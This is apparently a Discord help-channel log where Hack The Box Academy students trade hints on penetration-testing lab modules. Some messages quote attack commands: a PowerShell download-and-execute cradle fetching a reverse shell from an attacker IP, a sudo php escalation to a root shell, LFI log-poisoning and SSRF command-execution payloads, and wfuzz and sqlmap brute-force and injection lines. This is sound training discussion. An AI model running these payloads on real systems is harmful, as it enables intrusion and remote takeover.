#modules

1 messages · Page 523 of 1

coral tree
#

Yep the Metasploit module, apologies if I missed that earlier.

split fable
#

👌🏻 thanks!

lucid mirage
#

@distant stream it's working. I did it on my own windows.

distant stream
lucid mirage
#

It's not listening on 172.16.5.19

#

it's on the host where you registered the dll.

distant stream
#

Yes, I understand it also and my test with the rule works . So the Text on the Site is wrong 😉 "After starting our listener, we can transfer Proxifier portable to 172.16.5.19, and configure it to forward all our packets to 127.0.0.1:1080. Proxifier will route traffic through the given host and port. See the clip below for a quick walkthrough of configuring Proxifier" Thanks for the Crosscheck 🙂 🙂 🙂

modest pawn
#

d

red pendant
rustic sage
#

thank you!

naive ravine
#

I'm no expert, I just know enough to modify a script xD. I can definitely feel where you are coming from

edgy flame
#

Hey, you mind dming about this? still having trouble

west canopy
#

@edgy flame try using secretsdump.py and authenticate as the adunn user 🙂

rustic sage
#

Just curious: do people prefer using your own virtual machine or the Parrot for following modules?

languid dawn
#

depends on how long is the task

#

if it's short I'll just use pwnbox

iron basin
#

Anyone know/done shells and payloads module? Stuck a question pertaining to the payloads section of the module

knotty falcon
#

Thank you I finally fatigued it out with some help. Basically I had to pay attention to what Intruder's responses where explicitly saying, and then infer by what the responses were not explicitly saying. E.g when Intruder says "Only images are allowed" it doesn't necessarily say that the extension was bad.

wheat garden
#

Hi seeing if any ones done the Windows Privilege Escalation module may be able to give me some insight. Stuck on the section titled "Credential Hunting"

question "Search the file system for a file containing a password. Submit the password as your answer." Hint: :"Start at C:\Users"

Did indeed find a txt file at c:\Users\htb-student\Documents containing a password but when I enter it HTB is saying its incorrect. Am I missing something or is this an error in the module?

west canopy
#

@lament crag try checking the root directory. ls /

wheat garden
sage jackal
#

Can someone help me with the broken authentication module on the section that I need to craft a reset token for htbadmin? I’m not that good at python so I can’t make the script to work and I’m stuck

fallow wraith
#

Hi

#

In Broken Authentication , I don't know why I can't find the encoding method

#

can anyone give a nudgepepehype

knotty falcon
#

I could use some help with the final Skills Assessment for the File Upload Attacks module please.

I've uncovered the source code of the ||upload.php|| file and found the name of the uploads directory, but I'm not quite sure how exactly ||my files are being renamed when uploaded.||

And although I have a list of file extensions that might work because the response from the Burp Intruder's extension fuzzing is "Only images are allowed"...which implies the extension is actually fine, I still can't get a "successful upload" response from anything I try.

fallow wraith
#

Can i DM?@feral gyro

feral gyro
tiny ledge
#

Can someone help me get started with Server-Side-Attacks skill assessment, I'm not sure which footprinting activities they mean here, if someone can at least DM me the method to use, I've tried everything taught on the module, but nothing even slightly matches the assessment website

wintry gorge
#

Have anyone finished the Windows privilege Escalation skill assessment? I need to find the creds for "ldapadmin" but im stuck. Can anyone provide a hint? thx

lament charm
#

hi everyone, can you help me please? i'm stuck answer meterpreter section, metasploit module, any suggestion for me?

rustic sage
lament charm
lament charm
lament charm
rustic sage
lament charm
lament charm
lament charm
tiny ledge
rustic sage
lament charm
tiny ledge
wintry gorge
summer lake
#

anyone doing the pivoting module?

rustic sage
pliant summit
#

Hey guys doing the machine in Getting started module in the last section, can someone take a look at my notes and tell me what I can do to be better/ improve methodology?

#

It's my first time approaching a machine alone so would appreciate anything

rustic sage
#

the notes?

pliant summit
rustic sage
cold marsh
#

need help with Server-side Attacks , DM me p,s

#

pls

tiny ledge
tiny ledge
spare condor
#

Can I DM someone regarding the Attacking Common Services Module (Attacking SMB section)???

uncut mirage
#

Hi, I've just reached the end of Command Injection course (Skills Assessment), I can't figure out where to inject the payload.

I've tried caching requests with burp but no matter what function I use on the site, no useful requests are cached.

Then I tried injecting into the URL but similarly without any luck. I've tried all the Injection Operators in the cheat sheet.

Seems like I'm stack at level 0 here, please help!

hollow hinge
#

hello, i am doing Local File Inclusion Skills assessment and i have managed to find the lfi and tried to poison on /proc/self/environ/ with the user agent <?=phpinfo(); ?> and when i checked my log file i can see that phpinfo() is working but system($_GET['cmd']) is not working can anyone correct me?

rustic sage
distant stream
summer lake
distant stream
#

Dm

tiny ledge
shadow verge
#

Is it on purpose that PIVOT-SRV01 is not domain joined computer, in module Pivoting Tunneling and Port forwarding skills Assessment?

#

Because, the adws is installed it is just disabled and actually I did not find any more hosts with ping sweep either.

spare condor
shadow verge
hollow hinge
ebon pine
#

Hi everyone, I am on the Web Enumeration section of the Getting Started Module and when trying to run gobuster on the target nothing happens. I also have tried pinging the target just to see if I can get any response but nothing? can someone please assist?

#

Am i doing something wrong?

void shadow
#

Gobuster assumes the default port for web services which is 80 but not default in our case

ebon pine
ebon pine
void shadow
#

Sure no problem

rustic sage
#

I'm in Linux fundamentals module and I downloaded the vpn key and ran it through sudo openvpn academy.ovpn. I then receive a initialisation Sequence complete but when I try to connect to ssh port nothing happens. No commands are working.After some time it shows Inactivity time out.

unkempt hull
#

anyone able to give me a nudge on AD Enumeration & Attacks - Skills Assessment Part I?

I need help with "Submit the contents of the flag.txt file on the Administrator desktop on MS01"

broken warren
#

I need assistance on command injection skills assessment. I haven't sent a malicious request but still get an error for one

inner blaze
#

I have a virus on my pc that duplicate files how do i get rid of it without losing my things

broken warren
#

How do I configure and run nginx reverse proxy and ajp? I can't bind to port 80 because it's already in use.

sly sable
#

Hi. I am stuck on Getting Start Module privilege escalation part of knowlege check. I used LinEnum.sh and found a vector to raise privilage using “sudo -l” command, but I could not go further. Is there any suggestion?

limber tartan
#

hola

zinc kiln
summer lake
sly sable
pliant summit
#

hey guys im in the last section of getting started module, i got the first flag but now i need to get privilege esc to root user. I found that i can use /bin/php without any password so I went on GTFObins to find a command that i can escalate sudo with. I found it but when i paste it into the meterpreter shell it does nothing. any idea? I upgraded the shell to tty

silent knoll
#

Hello!

I am currently stuck on the Skills Assessment of SQLMAP Essentials.

I have already found the issue with the user-agent. Unfortunately I can’t get any further.

Thanks for any help.

void shadow
#

or first export CMD="/bin/sh" then sudo php -r "system('$CMD');"

pliant summit
#

but what was i doing wrong?

void shadow
#

they both were different commands

#

the first one sets a environmental variable named CMD whose value is /bin/sh

#

tho you need to use export before that command to actually set it which gtfobins have specified

pliant summit
#

oh so instead of declaring the variable first you just put in the command straight away

void shadow
#

yes

#

both methods are correct

pliant summit
#

wait but I thought i did it like that

pliant summit
#

i ran the CMD = "bin/sh" cmd first

#

oh I need to export before use?

void shadow
#

its like export variable_name=value

pliant summit
#

where on gtfobins is that specified?

void shadow
#

nowhere

rocky tinsel
#

I cannot find the answer of the questions "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)" in ACTIVE DIRECTORY ENUMERATION & ATTACKS. Could someone help me please on this?

void shadow
#

it becomes common knowledge once you know about using env. variables and paths

pliant summit
#

okay so just as a rule of thumb from now on, I need to export the environmental variables before i try to declare them?

void shadow
#

or you can directly use them

#

just like we did

pliant summit
#

like this right? sudo php -r "system('/bin/sh');"

pliant summit
#

yea okay

#

makes sense, thank you

void shadow
#

YEP

#

Np

hasty gorge
#

can someone give me a nudge on File Upload Attacks Blacklist Filters?

silent knoll
#

Hello!

I am currently stuck on the Skills Assessment of SQLMAP Essentials.

I have already found the issue with the user-agent. Unfortunately I can’t get any further.

Thanks for any help.

west canopy
#

@silent knoll try adding an item to your cart and intercept with burp. There is some json in the body of the post request , and this is the injection point. From there you can fine tune your command until you get the flag.

knotty falcon
#

Can anyone here please assist me with the Skills Assessment for the File Uploads Attack module? Feel free to DM. Thank you.

iron basin
#

Anyone mind helping me understand the port forwarding going on in a particular HTB walkthrough?

uncut raptor
#

Hi people! I'm stuck again in the ZAP scanner section, anyone willing to give me a hand it seems the Scanner finds a Command injection vulnerability and I need to exploit it to read flag.txt
The thing is i don't really know how to exploit the vulnerability with the url it provides

west canopy
#

@uncut raptor so in this screenshot , it is running the command: cat /etc/passwd . But it's all URL encoded. So try replacing it with a URL encoded cat /flag.txt

uncut raptor
uncut raptor
west canopy
#

needs to be http and not https. Also your URL is slightly wrong

#

needs to be /devtools/ping.php

iron tartan
#

I need some help with the last question of the Information Gathering - Web - Skills Assessment of the Information Gathering - Web Edition module

#

I believe I have the right answer, but it doesn't seem to be working

uncut raptor
iron tartan
#

I found a subdomain with the keyword in it, but that doesn't seem to work for the answer

stable sparrow
#

Anybody here having issues connecting to the "Web Service & API Attacks" - "Arbitrary File Upload" site? Port 3001?

clear turret
#

Hi all, for the metasploit module - sessions&jobs (MSF sessions) could someone please DM or hint the relevant exploit for the root access? I tried ||sudo_baron_samedit|| but had trouble loading it. Thank you

stable sparrow
#

thanks so much! --fresh-queries did the trick 🙂

west canopy
#

@iron tartan if you're still having problems feel free to DM me 🙂

iron tartan
#

The formatting of my scripts had been a bit off so there were a couple extra characters in the subdomain name that I needed to remove

spare condor
#

@sweet heron Can I DM you??

tiny ledge
#

In the Broken Authentication module, first assignment. Which tools am I supposed to use to bruteforce the login, there's no mention of this

rustic sage
#

There is also a custom python script that performs a bruteforce attack

sly nebula
#

I think in "PIVOTING, TUNNELING, AND PORT FORWARDING " - "Meterpreter Tunneling & Port Forwarding
" there is a problem with the second question: "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x.x)". The format is wrong and the seemingly valid answer is not accepted. Could the module authors take a look into this? Thanks.

spare condor
#

@mild mango Can I DM you regarding the Attacking Common Services Module, Attacking SQL Section?

manic ermine
#

Anyone available who can help with AD Enumeration & Attacks - Skills assessment part 1?

tiny ledge
#

I'm trying to get the credentials for the very first task in Broken Authentication, I'm running with: wfuzz -z file,/opt/useful/SecLists/Usernames/cirt-default-usernames.txt -z file,/opt/useful/SecLists/Passwords/cirt-default-passwords.txt 159.65.58.189:32686 -d "username=FUZZ&password=FUZ2Z" | All I keep getting is the same error, UserWarning:Fatal exception: Too many arguments.

#

What's the issue here

#

Also how am I supposed to know the login part of the website, when it gives me nothing when I try to login

tiny ledge
rustic sage
charred cape
#

What's the dm?

tiny ledge
sly nebula
shadow verge
#

Pivoting course was so awesome 😍

rustic sage
#

hello, having trouble with sqlmap essentials module

#

[13:26:04] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable

rustic sage
#

looking at the course again

#

i manage to get something

#

ok i got the answer

rustic sage
#

what does this mean?

tiny ledge
#

Has anyone completed the Broken Authentication, first task? I'm getting nowhere here, cant find a simple username, or know what's the name of the 'login' page:

#

How can I wfuzz this if there is no login page

ebon pine
#

Hi Team!
I am working through Public Exploits on getting started. Am I doing something wrong here to start?

rustic sage
#

i would do a simple -sC -sV scan

ebon pine
rustic sage
#

0 host up

ebon pine
rustic sage
#

no problem

void shadow
red obsidianBOT
rustic sage
#

need help for sqlmap / --columns i dont understand

polar widget
#

what's the Proceed Data about ?! helps are appreciated

#

https://academy.hackthebox.com/storage/modules/112/enum-method3.png

west canopy
#

@ebon pine try navigating to the target:port in your browser 🙂

frigid vector
#

Hey guys need a hint on Skills Assessment - Using Web Proxies

west canopy
#

@frigid vector which question?

frigid vector
# west canopy <@497441476868046864> which question?

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

west canopy
#

DM me 🙂

coral tree
#

@rustic sage can I Dm you on a question about MSF?

violet rivet
#

Can i get some help on ACTIVE DIRECTORY ENUMERATION & ATTACKS on question on ACL

 What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
rocky tinsel
#

I tried to reset the target multiple times, but every time the same issue with RDP:

[20:01:52:567] [495568:495569] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[20:01:52:567] [495568:495569] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
[20:01:52:768] [495568:495569] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D] from server
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core.nla] - SPNEGO failed with NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D]
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

on rdesktop the username and password is not working

#

This is really totally strange. Did someone have a solution for this issue?

rustic sage
#

hey i got a question

#

Using auxiliary/scanner/smb/smb_ms17_010 as check

#

An SMB Login Error occurred while connecting to the IPC$ tree.

#

Scanned 1 of 1 hosts (100% complete)

#

Cannot reliably check exploitability.

#

whats wrong with it?

west rampart
#

So, what's the question?

rustic sage
#

i have to use metasploit to follow up with the Document and get the flag

#

but im having issues with metasploit

west rampart
#

Can you screenshot me the question?

rustic sage
west rampart
#

Here

rustic sage
#

i cant send ss here

west rampart
#

Then paste the question

rustic sage
#

when i run the "check" command on metasploit i get the "An SMB Login Error occurred while connecting to the IPC$ tree.
" error

#

when i run it i get Rex::Proto::SMB::Exceptions::LoginError: Login Failed: execution expired

#

1. An SMB Login Error occurred while connecting to the IPC$ tree. 2. Rex::Proto::SMB::Exceptions::LoginError: Login Failed: execution expired

#

these are the 2 errors im getting

sage jackal
#

Hey can someone give me some hint on Broken Authentication Skills Assessment?

violet rivet
sage jackal
rocky tinsel
spice saddle
#

Hello did the pws.list worked for you?

#

😦 help

brazen hinge
#

PASSWORD ATTACKS / Credential Hunting in Linux

Examine the target and find out the password of the user Will. Then, submit the password as the answer.
...

I dont understand the hint: "From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose."

There a ssh service? I Scanned the ip and dont give some important service related with the module as smb, ssh, rdp, etc

rocky tinsel
#

In AD Enumeration & Attacks - Skills Assessment Part I the questions of the users cleartext password. Could someone give me a hint where I can find the user password?

knotty falcon
#

EDIT: Nevermind I see where I messed up now. Got the flag.

Looking for help on the "SSRF Exploitation Example" module. please.

I'm trying to use the bash script provided in the lesson, but I keep getting the error: bash: syntax error near unexpected token >'`

whenever I copy/paste the script into my terminal. Anyone know how I can fix this script to avoid the error?

System501@htb[/htb]$ function rce() {
function> while true; do
function while> echo -n "# "; read cmd
function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
function while> curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
function while> echo ""
function while> done
function> }

uncut raptor
#

Hi folks! i'm stuck at Skills Assessment - Using Web Proxies
where i have to fuzz the md5 cookie . In case anyone remembers this, it's a 31 char md5 hashed cookie where the excercise suggests hashing the last character and den encode with processing.
I'm running my attack with all this processing and getting all the same responses with 200 OK, i don't see a flag anywhere *edit @west canopy you remember this?

woeful oxide
#

Hey fellow hackers, justa n00b with a quick question regarding linux. Im doing the cracking passwords with hashcat / Cracking wireless (WPA/WPA2) handshakes with hashcat module, My kali is running in a VM (UTM) aarch64 Mac M1 and I'm getting this error

west canopy
#

@woeful oxide you need to be in the same directory as the cap2hccapx.bin file

west canopy
#

yes , you are trying to run a binary that is not located in your current working directory

native comet
#

@here Hey everyone i am stuck at intro to bash
for loop question and i am getting this error any help on this? it myabe that i am using a diff verion of openssl im the pwnbox how can i fix it?

#

this is my script

#

i didnt change anything on the original file just added these lines

woeful oxide
woeful oxide
woeful oxide
west canopy
#

Yes I am getting the same results as you 😦 Maybe try it on the pwnbox?

ionic pendant
#

hello?

#

hi

sweet heron
#

Where is the file shell.ps1 suppose to be uploaded? I can't find it after a successful GET code. 200. Is it supposed to execute itself automatically.

west canopy
#

shell.ps1 is hosted locally on your attack machine while running an http server. Druva.ps1 is uploaded to the target and ran from powershell

sweet heron
#

Yes and then $cmd of druva.ps1 uploads the shell.ps1 via IEX or is it suppose to automatially execute it? (this command: $cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.4:8080/shell.ps1')")
Because the file is well uploaded from my http server, but nothing happens after.

shut bronze
#

anyone could help me here i run ffuf but found nothing intereesting

devout vector
#

hey i have a question guys does anyone have the issue where they openvpn but cant ping the module?

#

i was trying to make sure i was connected to the academy vpn

#

because when i was trying to run gobuster it was gettting errors

#

i will try again right now because i see sequence complete

#

get this which i know im connected to the vpn

#

but when i attempt to ping the module i get an error

#

packet loss

#

web enumeration

west canopy
#

@devout vector typically Docker targets aren't pingable

#

@lament crag try checking the root directory. ls /

torpid roost
#

I know I definitely got the flag for "Find the flag by using a webshell." but it says its wrong. Is this this an error?

brazen hinge
manic ermine
#

Hi Again, Still looking for some help with AD Enumerations and attacks skills assessment. If anyone is available any help would be much appreciated

manic ermine
#

🙏

rustic sage
#

stuck on sqmlap module case 7

rustic sage
#

what am i doing wrong

#

what the hell i'm suposed to do with this hint

  • "Try to count the number of columns in the page output, and specify them for sqlmap."
jagged zenith
#

Hello guys

rustic sage
#

hello

acoustic owl
rustic sage
#

i found this but like

#

id,name,etc... ?

acoustic owl
#

Yes, just specify the number of columns like id, name, etc.

rustic sage
#

number?

#

i tried --columns=5 but it doent worked

acoustic owl
#

You are on the right track

rustic sage
#

it dosent take a value like =5

#

i try with --columns id,name,birthday.... now we'll see

acoustic owl
#

No, you must specify a value

distant stream
rustic sage
acoustic owl
#

try with --union-cols

rustic sage
#

I just add --union-cols? to the current command or i replace the --columns 5

acoustic owl
#

replace

rustic sage
#

ok thanks

#

the command run for a life

#

i will let it run while i eat we'll see

#

sqlmap -u 'http://157.245.33.77:30196/case7.php?id=1' --level=5 --risk=3 --threads=10 --union-cols=5 --batch

acoustic owl
#

Has anyone finished the Attacking Common Services module and can give me a hint on the last question on Attacking Common Services - Hard?

polar widget
#

Yo guys
Is the target server a shared instance? I saw the exploits were already available there

#

And compiled too

lethal atlas
torpid roost
#

I know I definitely got the flag for "Find the flag by using a webshell." but it says its wrong. Is this this an error?

polar widget
torpid roost
#

@lethal atlas SQL injection writing files

hollow hinge
rustic sage
#

sqlmap -u 'http://159.65.58.189:30795/case7.php?id=1' --level=5 --risk=3 --union-cols=5 --dbs --crawl=2 --threads=10 --batch --dump

#

got the flag with

#

sqlmap -u 'http://159.65.58.189:30795/case7.php?id=1' --level=5 --risk=3 --dbs --crawl=2 --threads=10 --batch --dump

#

getting rid of the --union-cols got me the flag wtf

tight mesa
#

hello everyone

#

anyone who has completed "Using Web Proxies" Module, to help me to understand what we have to do in the Question under "ZAP Fuzzer" section

#

cause I really not understanding what exactly have to do...!!!

ebon pine
#

Hi Team!
I have been working on the Public Exploits section of Getting Started and I am having a hard time understanding what I am doing incorrect

#

The hint is telling me to find a plugin vulnerability, the google maps one is the only one that seems to align with the hints from putting the IP:Port in the browser, it showed up on the search and msfconsole. I set the RHOST to the target and RPORT to the port given to me by HTB. I assume the TArgetURI is the path provided by MSFConsole. Any help would be great appreciated!

unique valve
#

Targeturi is essentially the url of the website &/or web app hosted on the target. @ebon pine

candid sandal
#

Hi guys ! I have a question : in the archetype challenge of the starting point, we are using an extended procedure of Microsoft SQL Server called xp-cmdshell to be able to run a command line on the machine. But after that, we are trying to set up a 'reverse shell' with NC. I don't understand that. We already have access to the command line / power shell. Why are we trying to set up something else ?

unique valve
# candid sandal Hi guys ! I have a question : in the archetype challenge of the starting point, ...

Theres a few reasons you may want to upgrade to a reverse shell from xpcmdshell. One getting a reverse shell will allow for more interactive access on the underlying host. Youll be able to move to different directories, upload & execute files and even elevate privileges easier. Then if it was a multi-host network having a fully interactive shell would allow you to try to pivot to another host. Your pretty limited on what you can do through xpcmdshell compared to a fully interactive shell.

candid sandal
unique valve
quiet prism
#

i'm working on the nibbles module following the academy guide and i'm stuck if anyone can help me out with a netcat issue

#

Nevermind got it. You have to add the script to the original thing not replace it
Ok the code is showing up but isn't triggering my netcat listener...

candid sandal
#

To be able to use a reverse shell, we use netcat and bind it to the a command line program with the -e option. Why can't I see this option in nc -h ?

void shadow
#

the help menu offers basic flags and parameters which are used

#

you can consult the man page for all the flags

candid sandal
#

alright, thanks !

ebon sapphire
#

I'm working on the hacking wordpress module and getting stuck on the directory indexing. I'm not sure if it is me or something is wrong with the target system. Using the cheat sheet and everything provided in the lab up to this point, I can't get anything for the question referring to manually enumerating the target for any directories whose contents can be listed. The wpscan keeps failing, saying that the system seems to be down. I know this is taking way longer then it should. Can somebody please give me a hint?

void shadow
#

haven't done the module but did you try running gobuster or something like that?

#

it will give you list of directories available on target

#

then you can manually check which directories content are listed when accessed

candid sandal
#

I want to download winPEASx64.exe as required but all of my browsers refuse telling me that it is a dangerous file.

#

Is there any way to bypass the browser protection ?

acoustic owl
acoustic owl
vivid thunder
#

having some issues with active directory in academy, details in #613049811481919508, any and all help would be awesome

sage jackal
#

Still struggling on Broken Authentication Skills Assessment. I enumerated users, grepped the rock you according to the password policy and tried to brute force the usernames found with no success. AlsoI haven’t gotten anything out of the cookie. Any help?

#

Oh just found out how the cookie is formed

lyric roost
#

Hi

hoary plinth
#

anyone can give me road map 2022 for cyber security ?

#

sry for bad english

raven cairn
#

What happened to the pillaging module??

sage jackal
#

Still struggling on Broken Authentication Skills Assessment. I enumerated users, grepped the rock you according to the password policy and tried to brute force passwords of the usernames found with no success. I found out how the cookie is formed and tried to use it in multiple ways to try bypass authentication but nothing worked. Any help?

ebon sapphire
hoary plinth
knotty falcon
#

I'm stuck on the Server Side Attacks Module: Nginx Reverse Proxy & AJP. Can someone give me a hand with this one?

When trying to setup the proxy/nginx on the Pwnbox, I keep getting the error nginx: [emerg] "location" directive is not allowed here in /etc/nginx/conf/nginx.conf:65 I assume I'm setting up the nginx.conf file incorrectly.

Just need to get the Tomcat version of the Target. Answer format: X.X.XX

west canopy
#

@ebon pine I don't think that exploit will work. Try navigating to the ip:port in your browser , this should reveal the WP Plugin being used.

#

@knotty falcon DM me 🙂

#

@sage jackal have you been able to get logged in as the support.xx user?

sage jackal
west canopy
#

Yes, the support user's username is in the format of support.xx , where xx is a country code. Once you find a valid support.xx username, you can filter rockyou.txt for words meeting the complexity requirement and use that to log in.

sage jackal
ebon pine
west canopy
#

@sage jackal try tampering the cookie to switch to an admin user 🙂

brazen hinge
#

Hello, i stucked in this challange, i extracted the root hash and tried with rockyou list 2 times and cant get the password, some idea?

PASSWORD ATTACKS / Passwd, Shadow & Opasswd

Examine the target using the credentials from the user Will and find out the password of the root. Then, submit the password as the answer.

sage jackal
rustic sage
#

do any of u have hacks for bullet force?

leaden quail
#

Im Stuck at "Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag?"

#

a tried all super users i knew like root, admin...

#

can someon give me a hint which wordlist i should use

manic ermine
#

Did anyone have issues cracking the mscacheV2 hash for the AD enumeration and attack module skills assessment?

quiet prism
#

I ended up giving up and going to bed. I’ve got the reverse shell but went to bed trying to escalate privilege

#

Found a script but couldn’t get it to execute in the .php file I uploaded

#

Home, nap then figure it out 😂

#

I think I know what the problem was but was too tired to continue. Will do! Appreciate it.

polar widget
#

Am I doing it wrong, but that's a valid query and LDAPwiki suggests the same :/

#

Full query -

#

Get-ADObject -LDAPFilter '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))' | select samaccountname,useraccountcontrol

foggy furnace
#

Module Shells & Payloads, section windows infiltration.

Question : Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\

Could someone help me on this one?

Thx in advance for your tyime

uncut raptor
#

hi fellows, quick question, do we have mobile hacking modules?

#

or any place you can advice I start studying from?

grand brook
#

Module File Transfers, section Windows File Transfer Methods .

Question : Another way to Uploud the uploud_win.zip file

Hi guys, I'm curious to find another way to uploud this file , I did success only
with copy and paste in my Windows machine, I tried with curl, Web-Request,
Bitsadmin but I didn't succeeded (give me always the 403 response - only-read server).

There is another way to uploud this file?

Thanks 🙂

thin barn
#

Anyone did hard skill assessment on Password Attacks? I'm losing my mind

brazen hinge
#

@thin barn did you solve "Passwd, Shadow & Opasswd" yet? I am stuck in getting the password of the root user after made unshadow from the passwd and shadow files with the user Will, i tried 2 times with rockyou wordlist and could not found the password, is on rockyou list?

spring bloom
#

Hello, has anyone done the Web Requests module specifically the Get section. I've been banging my head against the desk all afternoon trying to solve this....

grand brook
#

@spring bloom hi, I already done , what's the problem?

#

send me a pv 🙂

distant stream
naive ravine
#

Can someone provide me with a nudge? I am doing the Cookie Bruteforce section, question 1 of the Broken authentication module. Not sure which wordlist I can use to bruteforce the position of the user role to that of a super user...

raven cairn
#

Not the best place to post this.... Go to another discord for this.

#

MEtasploit module: Session and jobs section

#

"The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer."

#

I was able to get a shell, but I did not have root. I can't find the relevant exploit to run on the target system. (I have been using exploits for the elfinder service)

#

Help would be appreciated.

limpid wharf
#

Im stuck in the OSINT module What is the hosting provider for the inlanefreight.com domain? i used whois and shodan both gives me DigitalOcean but it dosent work anyone can help plz?

devout cliff
#

if anyone is available to help with the web attacks module i would appreciate it. stuck trying to understand this javascript

#

window.location = /download.php?contract=${encodeURIComponent(btoa(uid))};

#

specifically the encoding part

#

the module example they talk about uses md5 instead of the encodeURIComponent

#

but the contract filename is definately md5 encoded from what i can see

#

nevermind, was reading the wrong part of the code i guess

acoustic owl
limpid wharf
#

did they ever answer?

acoustic owl
acoustic owl
spring bloom
halcyon owl
#

Hello, I am doing the course Bug Bounties, I am in the module Using Web Proxies- and solve all the questions for skills assessment.
But only one questions I try to solve but I did not success if anyone can help me to give me the solution.
The question is Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)?????

random cape
#

Guys, I'm having problems with Skill Assessment - Broken Authentication. I found out about Username ||support||, but I don't know what to do next. I tried with Rockyou.txt wordlist filtered on ||first capital Letter, at Least One LowerCase, Final Digit, and at Least 20 Characters||, but none managed to make match with Username ||support||, even working with the timeout problem, and inserting manually. I also tried to see about this ||country code|| that people are talking about on the ||Support|| tab, but I couldn't take any information about it. Could anyone give me any hint about this part?

west canopy
#

@random cape so for the support user, it's actually in the format of support.xx , where xx is a country code. Once we find a valid username for the support user (there are more than one), we can filter the rockyou.txt wordlist for words matching the password complexity requirement.

#

@halcyon owl DM me 🙂

#

@foggy furnace DM me if you still need help on Shells & Payloads !

lethal atlas
#

whats up @west canopy

west canopy
#

@lethal atlas whats up brother !

lethal atlas
#

Working my life away lol

west canopy
#

They make you work Sundays?

lethal atlas
#

My wife does.

west canopy
#

@raven cairn Have you tried using the local exploit suggester?

#

@lethal atlas does she pay well?

#

@limpid wharf DM me if you still need help with OSINT 🙂

lethal atlas
#

@west canopy she lets me sleep with her so I guess thats good enough.

west canopy
#

lmao

#

@grand brook I was able to transfer the file over with Powershell

spice olive
#

Hey!, im stuck on the Server-Side Attacks, Nginx Reverse Proxy & AJP.

Each time i try to set up the enviroment i got this message:
nginx: [emerg] "location" directive is not allowed here in /etc/nginx/conf/nginx.conf:65
I assume I'm setting up the nginx.conf file incorrectly

west canopy
#

@spice olive DM me 🙂

raven cairn
#

Hello. I'm having issues again. Metasploit framework module: meterpreter section.

#

I have been trying a multitude of metasploit modules, but not have worked.

#

An nmap scan shows that Fortilogger can be accessed on the browser. Am I supposed to attack this?

west canopy
#

@raven cairn yes, try the fortilogger arbitrary file upload exploit

raven cairn
#

I have been doing that... I wonder what I am doing wrong ...

west canopy
raven cairn
#

Lol. I got the shell. Confused what I did wrong.

#

Probably just screwed up some options

wheat garden
#

windows privilege escalation skill assessment part 1. At the beginning having trouble exploiting the command injection vulnerability to get reverse shell. Windows CMD netcat one liners dont seem to be working for me. Any tips or clues?

livid pier
#

Doing vulnerability assessment, nessus skill assessment. Anyone know where the data is from the scan that was already ran?

west canopy
#

@wheat garden i was able to do it by starting an impacket-smbserver which hosted a netcat executable , then used that to get a reverse shell

#

@livid pier it should be My Scans --> Windows_basic_authed

wheat garden
livid pier
west canopy
#

Not sure what you mean

livid pier
#

I sshd in here, but it is telling me to attack a windows box

#

Im looking for this

west canopy
#

i think if you just go to port 8834 it will bring up the Nessus Dashboard

tiny ember
#

Is there a current issue with the website where the Unlock button isn't working on modules?

#

nothing coming through on the web console or network when i click it

#

Also tried in private window with no addons and same affect. All that changes is the padding on the webpage when i click it

west canopy
#

@tiny ember maybe try a different browser if you haven't already?

tiny ember
#

yeah i tried firefox as well, in private window. (currently using Brave)

#

interestingly, when i hit the Continue button here, i get this error at the top for "This module is coming soon" and i'm wondering if the "The Penetration Testing Process" module at the top is overriding all the other unlocks or something

#

tried on other pages as well and still no dice :(. Is there a different forum to go through for this. Or am I assuming that no one else is experiencing this?

#

gunna try a whole nother computer 🙂

#

okay weird, doesn't work on my Mac either

livid pier
#

@west canopy took me years but i found it, thank you

knotty falcon
#

Could I get some help with the Hacking Wordpress: Directory Indexing module please?
I assume the flag is buried somewhere in the ||wp-includes|| directory (?) and I've tried various curl and grep commands but no luck. Or is there a way we issue the tree command somehow to the remote web page?

rustic sage
manic ermine
#

Anyone on who can help with AD attacked skills assessment part II. I'm stuck on the "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain."

west canopy
#

@knotty falcon try looking in /wp-content/plugins/mail-masta

#

@manic ermine try using DomainPasswordSpray.ps1 and reproducing the steps shown in the "password spraying from windows" section

polar widget
#

The content of the flag.txt is getting incorrect how?

#

Module: shells and payloads
